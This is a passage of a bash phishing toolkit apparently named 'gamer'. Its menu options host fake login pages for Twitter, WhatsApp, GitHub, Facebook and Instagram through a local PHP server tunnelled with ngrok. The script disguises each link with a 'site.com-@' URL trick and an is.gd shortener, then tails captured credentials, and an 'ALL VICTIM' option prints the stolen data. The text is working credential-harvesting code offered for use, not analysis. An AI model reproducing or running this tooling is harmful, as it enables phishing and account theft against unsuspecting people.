echo ""
echo ""
printf "\e[1;33m>>> link-4: \e[1;37mhttps://pubg.reward.com-@$mask"
echo ""
echo -e $'\e[1;33m\e[0m\e[1;33m _________________________________________________________________  \e[0m'
echo ""
tail -f pubgmobile.com/output.txt
;;
esac
;;
5) cd $HOME
cd gamer/
echo ""
echo -e $'\e[1;31m <<\e[1;32mSTARTING NGROK SERVER\e[1;31m>>\e[0m'
php -S 127.0.0.1:4444 > /dev/null 2>&1 &
sleep 3
echo ""
echo -e $'\e[1;31m <<\e[1;32mPress CTRL+C For Cancel\e[1;31m>>\e[0m'
echo ""
ngrok http 4444 > /dev/null 2>&1 &
sleep 30
link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
printf "\e[1;33m>>> link-1:\e[0m\e[1;77m %s\e[0m\n" $link/twitter.com/index.php
echo ""
b="https://www.twitter.com-@"
printf "\e[1;33m>>> link-2: \e[1;37m${link/'https://'/$b}"/twitter.com/index.php
echo ""
v="$link/twitter.com/index.php"
short=$(curl -s https://is.gd/create.php\?format\=simple\&url\=${v})
mask=${short#https://}
echo ""
printf "\e[1;33m>>> link-3: \e[1;37mhttps://$mask"
echo ""
echo ""
printf "\e[1;33m>>> link-4: \e[1;37mhttps://twitter.com-@$mask"
echo ""
echo -e $'\e[1;33m\e[0m\e[1;33m _________________________________________________________________  \e[0m'
echo ""
tail -f twitter.com/output.txt
;;
6) cd $HOME
cd gamer/
echo ""
echo -e $'\e[1;31m <<\e[1;32mSTARTING NGROK SERVER\e[1;31m>>\e[0m'
php -S 127.0.0.1:4444 > /dev/null 2>&1 &
sleep 3
echo ""
echo -e $'\e[1;31m <<\e[1;32mPress CTRL+C For Cancel\e[1;31m>>\e[0m'
echo ""
ngrok http 4444 > /dev/null 2>&1 &
sleep 30
link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
printf "\e[1;33m>>> link-1:\e[0m\e[1;77m %s\e[0m\n" $link/whatsapp.com/index.php
echo ""
b="https://www.whatsapp.com-@"
printf "\e[1;33m>>> link-2: \e[1;37m${link/'https://'/$b}"/whatsapp.com/index.php
echo ""
v="$link/whatsapp.com/index.php"
short=$(curl -s https://is.gd/create.php\?format\=simple\&url\=${v})
mask=${short#https://}
echo ""
printf "\e[1;33m>>> link-3: \e[1;37mhttps://$mask"
echo ""
echo ""
printf "\e[1;33m>>> link-4: \e[1;37mhttps://whatsapp.com-@$mask"
echo ""
echo -e $'\e[1;33m\e[0m\e[1;33m _________________________________________________________________  \e[0m'
echo ""
tail -f whatsapp.com/output.txt
;;
7) cd $HOME
cd gamer/
echo ""
echo -e $'\e[1;31m <<\e[1;32mSTARTING NGROK SERVER\e[1;31m>>\e[0m'
php -S 127.0.0.1:4444 > /dev/null 2>&1 &
sleep 3
echo ""
echo -e $'\e[1;31m <<\e[1;32mPress CTRL+C For Cancel\e[1;31m>>\e[0m'
echo ""
ngrok http 4444 > /dev/null 2>&1 &
sleep 30
link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
printf "\e[1;33m>>> link-1:\e[0m\e[1;77m %s\e[0m\n" $link/github.com/index.php
echo ""
b="https://www.github.com-@"
printf "\e[1;33m>>> link-2: \e[1;37m${link/'https://'/$b}"/github.com/index.php
echo ""
v="$link/github.com/index.php"
short=$(curl -s https://is.gd/create.php\?format\=simple\&url\=${v})
mask=${short#https://}
echo ""
printf "\e[1;33m>>> link-3: \e[1;37mhttps://$mask"
echo ""
echo ""
printf "\e[1;33m>>> link-4: \e[1;37mhttps://github.com-@$mask"
echo ""
echo -e $'\e[1;33m\e[0m\e[1;33m _________________________________________________________________  \e[0m'
echo ""
tail -f github.com/output.txt
;;
8) cd $HOME
cd gamer/
echo ""
echo -e $'\e[1;31m <<\e[1;32mSTARTING NGROK SERVER\e[1;31m>>\e[0m'
php -S 127.0.0.1:4444 > /dev/null 2>&1 &
sleep 3
echo ""
echo -e $'\e[1;31m <<\e[1;32mPress CTRL+C For Cancel\e[1;31m>>\e[0m'
echo ""
ngrok http 4444 > /dev/null 2>&1 &
sleep 30
echo ""
link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
printf "\e[1;33m>>> link-1:\e[0m\e[1;77m %s\e[0m\n" $link
echo ""
b="https://www.facebook.com-@"
printf "\e[1;33m>>> link-2: \e[1;37m${link/'https://'/$b}"
echo ""
echo ""
c="https://www.xnxx.com-@"
printf "\e[1;33m>>> link-3: \e[1;37m${link/'https://'/$c}"
echo ""
echo ""
d="https://www.instagram.com-@"
printf "\e[1;33m>>> link-4: \e[1;37m${link/'https://'/$d}"
echo ""
v="$link"
short=$(curl -s https://is.gd/create.php\?format\=simple\&url\=${v})
mask=${short#https://}
echo ""
printf "\e[1;33m>>> link-5: \e[1;37mhttps://$mask"
echo ""
echo -e $'\e[1;33m\e[0m\e[1;33m _________________________________________________________________  \e[0m'
echo ""
tail -f output.txt
;;
'#')
echo ""
echo ""
echo -e $'\e[0m\e[1;33m                     <<THANKS FOR STAY US>> \e[0m'
sleep 1
exit
;;
9) cd $HOME
echo ""
echo -e $'\e[1;34m   [\e[0m\e[1;31m1\e[0m\e[1;34m]\e[0m\e[1;32m See Data \e[0m'
echo -e $'\e[1;34m   [\e[0m\e[1;31m2\e[0m\e[1;34m]\e[0m\e[1;32m Clear Data \e[0m'
echo -e $'\e[1;34m   [\e[0m\e[1;31m3\e[0m\e[1;34m]\e[0m\e[1;32m Update Tool \e[0m'
echo ""
read -p $'\e[1;31m >>\e[0m\e[1;32m Enter Your Choice : \e[0m' option
case $option in
1) cd gamer/
echo ""
echo -e $'\e[0m\e[1;33m                     <<ALL VICTIM>> \e[0m'
echo ""
cat output.txt
echo ""
cat facebook.com/output.txt
echo ""
cat ff.garena.com/output.txt
echo ""
cat pubgmobile.com/output.txt
echo ""
cat github.com/output.txt
echo ""
cat gmail.com/output.txt
echo ""
cat instagram.com/output.txt
echo ""
cat twitter.com/output.txt
echo ""
cat whatsapp.com/output.txt
echo ""
cat yahoo.com/output.txt
exit
;;
2) cd gamer/
echo "<<≠≠≠≠≠≠≠≠ <IP Finder> ≠≠≠≠≠≠≠≠>>" > output.txt
echo "<<≠≠≠≠≠≠≠≠ <Facebook> ≠≠≠≠≠≠≠≠>>" > facebook.com/output.txt
echo "<<≠≠≠≠≠≠≠≠ <Free Fire> ≠≠≠≠≠≠≠≠>>" > ff.garena.com/output.txt
echo "<<≠≠≠≠≠≠≠≠ <Github> ≠≠≠≠≠≠≠≠>>" > github.com/output.txt
echo "<<≠≠≠≠≠≠≠≠ <Gmail> ≠≠≠≠≠≠≠≠>>" > gmail.com/output.txt
echo "<<≠≠≠≠≠≠≠≠ <Instagram> ≠≠≠≠≠≠≠≠>>" > instagram.com/output.txt
echo "<<≠≠≠≠≠≠≠≠ <Twitter> ≠≠≠≠≠≠≠≠>>" > twitter.com/output.txt
echo "<<≠≠≠≠≠≠≠≠ <Whatsapp> ≠≠≠≠≠≠≠≠>>" > whatsapp.com/output.txt
echo "<<≠≠≠≠≠≠≠≠ <Yahoo> ≠≠≠≠≠≠≠≠>>" > yahoo.com/output.txt
echo ""
echo ""
echo -e "\e[33m                     << All Data Clear >> \e[m "
sleep 1
exit
;;
3) cd $HOME
rm -rf gamer
git clone https://github.com/mrmani280/gamer.git
cd gamer
chmod +x setup.sh
bash setup.sh
clear
gamer
;;
esac
;;
0)
xdg-open https://www.facebook.com/groups/1546183828897889
exit
;;
esac
echo ""
echo ""
echo -e "\e[33m              !! Invalid option Try Again !! \e[m "
xdg-open https://www.youtube.com/c/GamingWithManiPro
sleep 2
clear
echo ""
printf "\e[1;31mSTART AGAIN PLEASE WAIT."
sleep 1
clear
echo ""
printf "\e[1;31mSTART AGAIN PLEASE WAIT.."
sleep 1
clear
echo ""
printf "\e[1;31mSTART AGAIN PLEASE WAIT..."
sleep 1
clear
echo ""
printf "\e[1;31mSTART AGAIN PLEASE WAIT...."
sleep 1
clear
echo ""
printf "\e[1;31mSTART AGAIN PLEASE WAIT....."
sleep 1
clear
echo ""
printf "\e[1;31mSTART AGAIN PLEASE WAIT......"
sleep 1
clear
gamer
